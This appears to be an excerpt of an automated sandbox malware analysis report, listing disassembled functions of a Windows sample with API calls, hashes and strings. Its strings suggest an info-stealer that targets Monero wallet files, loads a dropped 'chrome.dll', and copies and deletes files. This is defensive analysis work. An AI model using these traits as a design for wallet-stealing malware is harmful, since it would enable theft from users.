                                  • Opcode Fuzzy Hash: 4eb3e70ba4b83afe742177874165be4facf925757e1c5b4b0adc886dc8269449
                                  • Instruction Fuzzy Hash: 3C01D275518108FFCB04DFD8C948EAEBBB9EB44304F208548F9199B744D731EA50DB90
                                  Function 006B12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006B12B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B12BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006B12D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006B12F5
                                  • RegCloseKey.ADVAPI32(?), ref: 006B12FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: db71505cf0cb1ba6d78d97639620031c5d3ad3eff5545e697c0c3a0f0a7d703e
                                  • Instruction ID: 34ab87dace9f8a5f36c3aa72397157210a14014883eb900aed72424cfa15e9e8
                                  • Opcode Fuzzy Hash: db71505cf0cb1ba6d78d97639620031c5d3ad3eff5545e697c0c3a0f0a7d703e
                                  • Instruction Fuzzy Hash: 350131B9A58209BFDB00DFD0DC89FAEB778EB48700F104198FA1597380D770DA409B90
                                  Function 006C68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 006C6903
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 006C69C6
                                  • ExitProcess.KERNEL32 ref: 006C69F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: ee5bb17da8e7b17f76df4931d04e8646c4b24a519067f6b8c0eda554c5d8156f
                                  • Instruction ID: 9374d625d376c749dcab0a2f19794c1832fa25f5e2914b01105cdfde05a5a9eb
                                  • Opcode Fuzzy Hash: ee5bb17da8e7b17f76df4931d04e8646c4b24a519067f6b8c0eda554c5d8156f
                                  • Instruction Fuzzy Hash: 9E3118B1911218ABDB54EB90DC96FEEB779EF08304F40418DF20A67191DF74AA48CF69
                                  Function 006C8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006D0E10,00000000,?), ref: 006C89BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C89C6
                                  • wsprintfA.USER32 ref: 006C89E0
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: d29afe6060777c71c9249232566bf621b2983300d71747bbb82a5425f162d2ae
                                  • Instruction ID: 2161cd1edaf3e7a7817061d859bcf580796d728208654fa143c7887a37c0ea35
                                  • Opcode Fuzzy Hash: d29afe6060777c71c9249232566bf621b2983300d71747bbb82a5425f162d2ae
                                  • Instruction Fuzzy Hash: FF2130B1A58204AFDB04DFD4DD49FAEBBB8FB48710F10451DF615A7390C775A9008BA0
                                  Function 006BA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 006BA098
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: 3b719af21cc92f28485fba0342d87b62389563152837f0e43aa4a60d2fd65b47
                                  • Instruction ID: d4ee38417ec77ec6b1081a70f7f49805483a4dfe845552c88f2b532d8a31bc63
                                  • Opcode Fuzzy Hash: 3b719af21cc92f28485fba0342d87b62389563152837f0e43aa4a60d2fd65b47
                                  • Instruction Fuzzy Hash: EBF01DB0A6C208AFD710AFE4EC88BA6B366E745300F200415E0059B390C2B5D8D4EB56
                                  Function 006C8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006C96AE,00000000), ref: 006C8EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C8EF2
                                  • wsprintfW.USER32 ref: 006C8F08
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 2fd0f5744416a1ff85a6b490835abb37d8973a625b86e4c719a09a77ba51930f
                                  • Instruction ID: 214fa3169544692e212b40d37a3dddee282f101ac6f9b24b0e6fb50985fa3ed4
                                  • Opcode Fuzzy Hash: 2fd0f5744416a1ff85a6b490835abb37d8973a625b86e4c719a09a77ba51930f
                                  • Instruction Fuzzy Hash: 1DE08C70A5C308BBDB00CBD4DD0AE6DBBB8EB04301F100094FD0987340DA719E00AB91
                                  Function 006BA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006BAA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 006BAB2F
                                  • lstrlen.KERNEL32(00000000), ref: 006BADEC
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 006BAE73
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 702010d651fca6b2f6a1100e2acd0b8a47774364f984d1a244ef6da7f4dbfc53
                                  • Instruction ID: 46cf24cb6e470e43cb2a6ce9c2a20cde3476850ae518d0f0a96eec1043a7608e
                                  • Opcode Fuzzy Hash: 702010d651fca6b2f6a1100e2acd0b8a47774364f984d1a244ef6da7f4dbfc53
                                  • Instruction Fuzzy Hash: 26E1CB7291011C9BCB44EBE4DDA2FFEB33AEF14304F50859DF11666191EE306A48DB6A
                                  Function 006BD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006BD581
                                  • lstrlen.KERNEL32(00000000), ref: 006BD798
                                  • lstrlen.KERNEL32(00000000), ref: 006BD7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 006BD82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: fd589c9af4e8bfe3b57594081c7fabf70c179143b8c005eb413ad01d85ac1b8e
                                  • Instruction ID: 29c808e03e16fe4ca65343c5dbdd701f1815abebed92f8fe82f996635af1af1b
                                  • Opcode Fuzzy Hash: fd589c9af4e8bfe3b57594081c7fabf70c179143b8c005eb413ad01d85ac1b8e
                                  • Instruction Fuzzy Hash: C091DC7291010C9BCB44EBE4DCA6FFEB33AEF14304F50456DF11666191EE34AA48DB6A
                                  Function 006BD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006BD901
                                  • lstrlen.KERNEL32(00000000), ref: 006BDA9F
                                  • lstrlen.KERNEL32(00000000), ref: 006BDAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 006BDB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 67fb796a66d3c9251757db11d63f2f1e5aebedfa577ac35e117797b41f4799da
                                  • Instruction ID: 9ed5c6232a025b5f912bea9c2f4b62185b6b578421fd8a6b9b3465a286851de2
                                  • Opcode Fuzzy Hash: 67fb796a66d3c9251757db11d63f2f1e5aebedfa577ac35e117797b41f4799da
                                  • Instruction Fuzzy Hash: F881CA7291010C9BCB44FBE4DCA6EFEB33AEF54308F50455DF11666191EE34AA08DB6A
                                  Function 0072FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: 5bb87085ec6ed32f4b82d5e784b86f2bba97403263183f5e3d1de73c21e6692f
